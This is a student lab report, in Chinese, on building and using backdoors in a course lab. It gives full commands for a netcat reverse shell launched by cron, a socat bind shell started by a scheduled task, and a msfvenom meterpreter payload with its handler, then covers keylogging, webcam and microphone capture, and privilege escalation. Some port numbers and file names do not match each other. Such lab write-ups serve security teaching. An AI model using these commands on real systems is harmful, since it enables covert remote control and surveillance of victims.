基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:网络钓鱼植入木马。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:绑定在合法软件上启动。

(3)Meterpreter有哪些给你映像深刻的功能?

答:记录按键功能,可以获取输入的密码。

(4)如何发现自己有系统有没有被安装后门?

答:用杀软杀毒。。。。。。

实验内容

(1)使用netcat获取主机操作shell,cron启动 (0.5分)

步骤/截图

  • cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
  • 在Windows系统下,监听5321端口
  • 在kali环境下,用crontab -e指令编辑一条定时任务,(crontab指令增加一条定时任务,-e表示编辑)选择编辑器时选择3(第一次会提示选择编辑器,以后就不会提示了);
  • 在最后一行添加58 * * * * /bin/netcat 169.254.175.85 5318 -e /bin/sh,意思是在每个小时的第58分钟反向连接Windows7主机的5321端口;
  • 当时间到了第58分时,Windows7获得kali的shell,可输入命令。

(2)使用socat获取主机操作shell, 任务计划启动 (0.5分)

步骤/截图

  • 搜索打开“计算机管理”;
  • 在“任务计划程序”中“创建任务”;
  • 填写任务名->新建一个触发器;
  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5321 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5321,同时把cmd.exestderr重定向到stdout上;
  • 创建完成之后,按Win+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行;
  • 此时,在kali环境下输入指令socat - tcp:192.168.70.144:5321,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5321端口,此时可以发现已经成功获得了一个cmd shell。

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

步骤/截图

  • 在kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.145 LPORT=5321 -f exe > 20165321_backdoor.exe,这里的IP地址为kali的IP地址,运行指令后生成了后门程序“20165318_backdoor.exe”;
  • 在Windows7下执行nc.exe -l 5321 > 20165321_backdoor.exe,这样被控主机就进入了接收文件模式,也可以使用ncat.exe -lv 5321 > 20165321_backdoor.exe指令,通过-lv选项看到当前的连接状态;
  • 在kali中执行nc -nv 192.168.70.144 5321 < 20165321_backdoor.exe,这里的IP地址为Windows7的IP地址;
  • 传送接收文件成功;
  • 在kali上输入`msfconsole指令,然后在Windows7中打开后门程序,kali中就进入msf控制台;
  • 输入use exploit/multi/handler使用监听模块,设置payload;
  • 输入set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload;
  • 输入set LHOST 192.168.70.145,这里用的是kali的IP,和生成后门程序时指定的IP相同;
  • 输入set LPORT 5321,同样要使用相同的端口;
  • 输入show options查看设置;
  • 设置完成后,输入exploit执行监听;
  • 在Windows7中运行后门程序;
  • kali获得Windows7的shell。

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

步骤/截图

  • 使用record_mic指令可以截获一段音频,可以用-d选项设置录制时间;
  • 使用webcam_snap指令可以使用摄像头进行拍照;
  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录;
  • 使用screenshot指令可以进行截屏;
  • 先使用getuid指令查看当前用户,使用getsystem指令进行提权;
  • webcam stream指令可以使用摄像头进行录像。

错误记录

在本次实验当中,我遇到了一些错误。

  • 在第(3)步中,我在执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.145 LPORT=5321 -f exe > 20165321_backdoor.exe生成后门程序的时候,一开始一直提示无法生成后门程序,后来才发现,原来是重新启动kali的时候,IP地址已经发生了改变,而我在输入指令的时候,还沿用的是上次开启kali的时候的IP地址,因此发生错误。
  • 在第(4)步中,在虚拟机内无法启动摄像头。

实验感想

在本次实验当中,我更深刻地体验到了比在第一次实验当中更为深入、更为隐蔽、更为功能强大的后门程序所产生的威力。在第一次实验当中,攻击方对受害方攻击成功之后,仅仅只是获得了受害方主机的shell,但在第二次实验当中,攻击方向受害方注入后门程序,攻击成功之后,不仅仅可以获得受害方主机的shell,而且还可以调用受害方主机的摄像头进行拍照、录像,还可以在受害方主机上录音、截屏,甚至获取受害方主机的键盘敲击记录,功能甚是强大,也让我们了解到了恶意代码与后门程序的危害性,以让我们增强在这方面的防御。

2018-2019-2 网络对抗技术 20165321 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. 天梯赛 L1-043 阅览室

    L1-043 阅览室 (20 分) 天梯图书阅览室请你编写一个简单的图书借阅统计程序.当读者借书时,管理员输入书号并按下S键,程序开始计时:当读者还书时,管理员输入书号并按下E键,程序结束计时.书号为 ...

  2. 不装插件,查看.rp文件

    AxShare国内平台地址:http://share.axure.org临时急用可以使用公用帐户.用户名:axure@webppd.com,密码:webppd123 上传.rp文件,点击 url 地址 ...

  3. 一致推崇的Linux系统还有那么安全吗?

    今天想谈谈关于系统安全:我们都知道,Linux早已成为趋势,在我们互联网中占有不可或缺的地位,在我们眼中,它是神圣的,不可替代的,无懈可击的:真的是这样的吗? 但是关于病毒对Linux所造成的一系列威 ...

  4. lambda表达式——写多线程

    JDK1.8 中Lambda 表达式的出现,基本可以取替原来的匿名类实现多线程的方式.下面列举常用的常用的三种情况. 一.普通开启异步线程   new Thread(() -> System.o ...

  5. iOS12系统应用发送邮件中的附件

    iOS12系统应用发送邮件中的附件 iOS12系统应用发送邮件中的附件,如果发送邮件的内容很多,或者包含文档.图片等,可以以附件的形式进行发送.此时需要使用addAttachmentData(_:mi ...

  6. ubantu16.04安装ns2.34 错误

    把ns2.34解压缩之后,sudo ./install 出现的错误: 错误一:安装NS2.34过程中出现如下的错误:tools/ranvar.cc: In member function ‘virtu ...

  7. Python数据分析基础教程

    Python数据分析基础教程(第2版)(高清版)PDF 百度网盘 链接:https://pan.baidu.com/s/1_FsReTBCaL_PzKhM0o6l0g 提取码:nkhw 复制这段内容后 ...

  8. 关于python列表和元组的基本操作

    一.列表 列表是python中最常出现的一种数据存储形式,掌握列表的基本操作可以快速而有效的提高我们的代码书写效率.列表中存放的数据有如下基本操作:如增.删.改.查,掌握了这四个操作,就基本掌握了列表 ...

  9. Lambda查询

    使用EF查询数据库,之前使用Linq表达式,现在改成另一个种方法查询:Lambda表达式 TestEntities db=new TestEntities(); ).FirstOrDefault(); ...

  10. SQL之NULL值的几种处理方式

    1.创建测试表: drop table if exists tab_null_operator; create table tab_null_operator as select 1 as id,'c ...